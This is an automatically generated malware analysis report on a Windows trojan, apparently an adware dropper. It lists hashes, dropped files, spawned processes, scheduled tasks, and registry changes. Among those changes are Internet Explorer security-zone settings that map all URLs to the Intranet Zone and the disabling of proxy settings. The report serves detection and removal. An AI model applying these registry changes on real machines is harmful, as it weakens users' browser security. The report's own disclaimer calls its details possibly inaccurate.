Gen.Variant.Mikey.11140_7e90634f28

by malwarelabrobot on August 2nd, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Mikey.11140 (B) (Emsisoft), Gen:Variant.Mikey.11140 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 7e90634f28f2de92562f5f89c77a2266
SHA1: b8bc5194554d2076711b50493c64fad202df4d07
SHA256: baf060d2156879d97ee504c445d5da556c1d084b4d77878f0ca17475780bf5b9
SSDeep: 24576:mE2WFU20IskeQap2/hLA9lmEbyPhJFCNZ22akhPzRabLfbdigbQvmjTtLXaLnPMF:c20Uha8pulmRwakt9gLfbAgbQePtLXey
Size: 1432064 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: WBNDY
Created at: 2015-06-28 12:38:06
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

BrowserHelper.exe:3952
Owxbocg.exe:3476
ping.exe:3544
ping.exe:2200
ping.exe:2440
ping.exe:3428
ping.exe:3660
ping.exe:3380
ping.exe:2616
ping.exe:2936
ping.exe:2448
ping.exe:3936
ping.exe:2192
ping.exe:1768
ping.exe:476
ping.exe:2624
ping.exe:3984
ping.exe:2828
ping.exe:2944
ping.exe:2820
ns19.tmp:3928
ins_sense.exe:2400
find.exe:1336
f.exe:3008
Wiwyiyugmbkl.exe:3564
sc.exe:3620
sc.exe:1368
sc.exe:3300
net.exe:3464
net.exe:3828
net1.exe:1388
net1.exe:3552
setup.exe:2060
setup.exe:3052
tcpsvcs.exe:2296
ins_geforce.exe:2388
ShopperPro.exe:2116
c98dc9.exe:3000
ins_shopperpro.exe:1204
regsvr32.exe:2224
%original file name%.exe:608
%original file name%.exe:2164
%original file name%.exe:2156
%original file name%.exe:576
%original file name%.exe:228
BROWSE~2.EXE:3668

The Trojan injects its code into the following process(es):

YTDownloader.exe:2380

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Owxbocg.exe:3476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\vdutpty.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\bprbcxj.dll (5 bytes)
%Program Files%\Sense\81f9e262-02a6-4ea6-97d4-4caa9d97c07c-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\pvmkp.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\ybviqo.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\63246 (39765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp (541196 bytes)
%WinDir%\Tasks\81f9e262-02a6-4ea6-97d4-4caa9d97c07c-5.job (72 bytes)
%Program Files%\Sense\utils.exe (66065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\205121 (9520 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\zbacizheh.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\hcrejpusx.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\xlcieu.dll (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\vdutpty.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\bprbcxj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\pvmkp.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\ybviqo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\63246 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\205121 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\zbacizheh.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\hcrejpusx.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\xlcieu.dll (0 bytes)

The process ins_sense.exe:2400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process f.exe:3008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Owxbocg.exe (1217838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ybviqo.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Ltyvpos.tmp (332963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ikjtrx.dll (2028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\zbacizheh.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_c (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_b (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_a (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8593.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_e (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_d (129726 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Owxbocg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\zbacizheh.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ybviqo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ikjtrx.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Ltyvpos.tmp (0 bytes)

The process Wiwyiyugmbkl.exe:3564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (595014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\System.dll (784 bytes)
%WinDir%\Tasks\fe56664a-ffec-4080-bee0-aa32cf23ac94-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\hdiyyhpn.dll (4 bytes)
%Program Files%\Ge-Force\fe56664a-ffec-4080-bee0-aa32cf23ac94-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\eetruve.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\348421 (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\ewcryykvh.dll (5 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\vokcloqal.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\fejdf.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\kidpn.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y41BH0NX\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\caaig.dll (14 bytes)
%Program Files%\Ge-Force\utils.exe (65077 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\406185 (39553 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\ipgeoapi[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\406185 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\hdiyyhpn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\eetruve.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\348421 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\ewcryykvh.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\vokcloqal.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\fejdf.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\kidpn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\caaig.dll (0 bytes)

The process setup.exe:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsExec.dll (6 bytes)
%Program Files%\ShopperPro\Updater.exe (25776 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\jsdrv.exe (100378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\AccDownload.dll (9320 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsProcess.dll (4 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (156512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\MoreInfo.dll (7 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\ns8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\MoreInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\jsdrv.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm7.tmp (0 bytes)

The process setup.exe:3052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44478 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (48500 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\ns19.tmp (6 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11035 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4236 bytes)
%Program Files%\YTDownloader\Updater.exe (17576 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10762 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\AccDownload.dll (9226 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Program Files%\Common Files\System\SysMenu.dll (15287 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20022 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsExec.dll (6 bytes)
%Program Files%\YTDownloader\converter.exe (61415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp (4 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsvE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp (0 bytes)

The process tcpsvcs.exe:2296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszA.tmp (242363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup1.exe (229796 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\D1958.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup.exe (0 bytes)

The process ins_geforce.exe:2388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process ShopperPro.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)

The process c98dc9.exe:3000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\caaig.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_e (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_d (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_a (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_c (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_b (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\vokcloqal.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\cnhwe.dll (2057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wptsit.tmp (333899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wiwyiyugmbkl.exe (1224639 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8593.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wiwyiyugmbkl.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\vokcloqal.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\cnhwe.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wptsit.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\caaig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp (0 bytes)

The process ins_shopperpro.exe:1204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (82355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup.exe (869966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup1.exe (79085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\D1958.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\D1958.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\NK.lky (0 bytes)

The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_sense.exe (1509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_geforce.exe (1509 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_shopperpro.exe (31368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UD6RSBGT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y41BH0NX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\bxsdk32.dll (9731 bytes)

Registry activity

The process BrowserHelper.exe:3952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 22 F8 65 1D F1 9E 15 9B FC 60 38 D3 C9 2A C8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process Owxbocg.exe:3476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrPublisherId" = "20891"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrAppId" = "70299"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "e779ddeb30ff0167256d26524544a5f7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "13b4b43ecfec3569c696888aa234740eIE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayName" = "Sense"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "13b4b43ecfec3569c696888aa234740eIE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 7E F7 AC 55 EB AB 66 8E 20 78 E6 D7 73 65 67"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "e779ddeb30ff0167256d26524544a5f7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayIcon" = "%Program Files%\Sense\utils.exe"

[HKCU\Software\InstalledBrowserExtensions\Sense ]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"Publisher" = "Sense "

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ping.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
